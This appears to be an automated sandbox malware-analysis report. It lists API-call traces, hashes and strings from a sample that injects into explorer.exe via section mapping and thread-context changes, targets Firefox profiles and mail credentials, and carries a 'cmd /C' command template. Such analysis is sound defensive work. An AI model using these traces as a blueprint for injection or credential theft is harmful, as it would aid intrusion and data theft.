  • Function_000164F7 API ID: CreateDirectoryGetTempFileNameGetTickCount, String ID: \Low, Total Matches: 53
  • Function_00018692 API ID: StrTrim$_struprlstrlenmemcpymemset, String ID: , Total Matches: 53
  • Function_0000078D API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread, String ID: , Total Matches: 53
  • Function_00009895 API ID: RtlAllocateHeaplstrcpy, String ID: http, Total Matches: 52
  • Function_0000BB46 API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove, String ID: GET $GET $OPTI$OPTI$POST$PUT , Total Matches: 52
  • Function_00002996 API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey, String ID: [FILE]$[FILE], Total Matches: 51
  • Function_00001B25 API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile, String ID: , Total Matches: 51
  • Function_00001416 API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen, String ID: , Total Matches: 50
  • Function_0000973F API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf, String ID: , Total Matches: 50
  • Function_0000064D API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf, String ID: , Total Matches: 49
  • Function_00008BEF API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap, String ID: W, Total Matches: 48
  • Function_0000A4E6 API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep, String ID: , Total Matches: 46
  • Function_000019BF API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen, String ID: %APPDATA%\Microsoft\, Total Matches: 45
  • Function_00004816 API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy, String ID: , Total Matches: 43
  • Function_00001A39 API ID: HeapFree$CloseHandleRtlImageNtHeader, String ID: [FILE]$[FILE], Total Matches: 43
  • Function_00016471 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy, String ID: , Total Matches: 43
  • Function_00000586 API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf, String ID: , Total Matches: 43
  • Function_00006664 API ID: HeapFree$GetLastErrorRtlAllocateHeap, String ID: , Total Matches: 40
  • Function_00009F14 API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf, String ID: , Total Matches: 40
  • Function_00000CB2 API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: pnls, Total Matches: 38
  • Function_00002D4D API ID: RegCloseKeyRegQueryValueExwsprintf, String ID: Client, Total Matches: 38
  • Function_00000CB2 API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: pnls, Total Matches: 38
  • Function_000037EC API ID: HeapFreememcpy, String ID: ($Client, Total Matches: 38
  • Function_0001E422 API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey, String ID: , Total Matches: 37
  • Function_0001D6E9 API ID: GetLastErrorGetVersion, String ID: GET$POST, Total Matches: 37
  • Function_00002F95 API ID: HeapFree$RtlAllocateHeaplstrcmpi, String ID: Main, Total Matches: 37
  • Function_0000CA13 API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen, String ID: , Total Matches: 36
  • Function_00015996 API ID: FlushFileBuffersGetLastErrormemset, String ID: K$P, Total Matches: 35
  • Function_00000E86 API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy, String ID: , Total Matches: 34
  • Function_0000332F API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy, String ID: pnls$}nls, Total Matches: 33
  • Function_0000332F API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy, String ID: pnls$}nls, Total Matches: 33
  • Function_00003CEB API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs, String ID: , Total Matches: 33
  • Function_0000C171 API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects, String ID: , Total Matches: 31
  • Function_00000B85 API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy, String ID: \sols, Total Matches: 31
  • Function_000004CA API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary, String ID: USER32.DLL$pnls$pnls, Total Matches: 29
  • Function_000004CA API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary, String ID: USER32.DLL$pnls$pnls, Total Matches: 29
  • Function_00005604 API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy, String ID: , Total Matches: 29
  • Function_000049D7 API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 27
  • Function_00004C23 API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: Main, Total Matches: 27
  • Function_000041AB API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf, String ID: Main, Total Matches: 26
  • Function_0000A410 API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle, String ID: , Total Matches: 26
  • Function_00004B7B API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy, String ID: , Total Matches: 25
  • Function_00000F61 API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy, String ID: , Total Matches: 25
  • Function_0001E75B API ID: LocalFreelstrcatlstrcpymemcpy, String ID: IMAP$P$POP3$SMTP, Total Matches: 23
  • Function_000003D6 API ID: CloseHandleHeapDestroySetEvent, String ID: , Total Matches: 21
  • Function_00000395 API ID: GetLastErrorHeapFreememset, String ID: D, Total Matches: 21
  • Function_00005C08 API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject, String ID: %APPDATA%\Mozilla\Firefox\Profiles, Total Matches: 19
  • Function_00002C8B API ID: GetModuleFileName$GetLastError, String ID: , Total Matches: 12
  • Function_0000044C API ID: HeapFreeStrStrI, String ID: pnls, Total Matches: 9
  • Function_00006422 API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs, String ID: D$cmd /C "%s> %s1", Total Matches: 8
  • Function_00016A61 API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 6
  • Function_00003003 API ID: VirtualAllocVirtualFreelstrcpynmemcpy, String ID: Apr 14 2018$pnls$pnls, Total Matches: 5
  • Function_00003003 API ID: VirtualAllocVirtualFreelstrcpynmemcpy, String ID: Apr 14 2018$pnls$pnls, Total Matches: 5
  • Function_000016C0 API ID: HeapFreeRtlAllocateHeaplstrcpylstrlen, String ID: W, Total Matches: 4
  • Function_0000C890 API ID: HeapFreeLocalFreeReleaseMutexRtlRemoveVectoredExceptionHandlerSleepEx, String ID: , Total Matches: 3
  • Function_00000535 API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString, String ID: pnls, Total Matches: 2
  • Function_00000535 API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString, String ID: pnls, Total Matches: 2
  • Function_00000000 API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeapWriteFilelstrcpy, String ID: qwerty, Total Matches: 1
  • Function_0001D8D2 API ID: GetLastErrorlstrlenwsprintf, String ID: `, Total Matches: 1
  • Function_0001CB79 API ID: HeapFree$GetTickCountRtlAllocateHeap$QueryPerformanceCounterQueryPerformanceFrequencyRtlEnterCriticalSectionRtlLeaveCriticalSectionStrTrim_aulldivlstrcpy, String ID: , Total Matches: 1
  • Function_0000C519 API ID: GetLastErrorRtlAllocateHeap$CloseHandle$CreateMutexLoadLibraryNtQueryInformationProcessOpenProcessmemsetwsprintf, String ID: , Total Matches: 1
  • Function_0001CE6F API ID: HeapFree$lstrcat$RtlAllocateHeap$StrTrimlstrcpy, String ID: , Total Matches: 1
  • Function_0000A7D1 API ID: RtlAllocateHeap$GetLastErrorRtlInitializeCriticalSection, String ID: , Total Matches: 1

Process Name: explorer.exe Analysis ID: 44237

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:6DDCA324434FFA506CF7DC4E51DB7935
Total matches:79
Initial Analysis Report:Open
Initial sample Analysis ID:44237
Initial sample SHA 256:7AD80E267DEB4DCF858EE8112690CA6EE13D49233F47DAFEB2D7D331DC6D22ED
Initial sample name:0.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 87024.exe Analysis ID: 56552

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:1714CF2647A549D0D7529223ACF0FC97
Total matches:61
Initial Analysis Report:Open
Initial sample Analysis ID:56552
Initial sample SHA 256:C28329422090F74BA76A9BFDB7B0F1E578A5B83DB0CBED2D6BC365D968EF4652
Initial sample name:Healthy_Women_Inquiry.doc

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
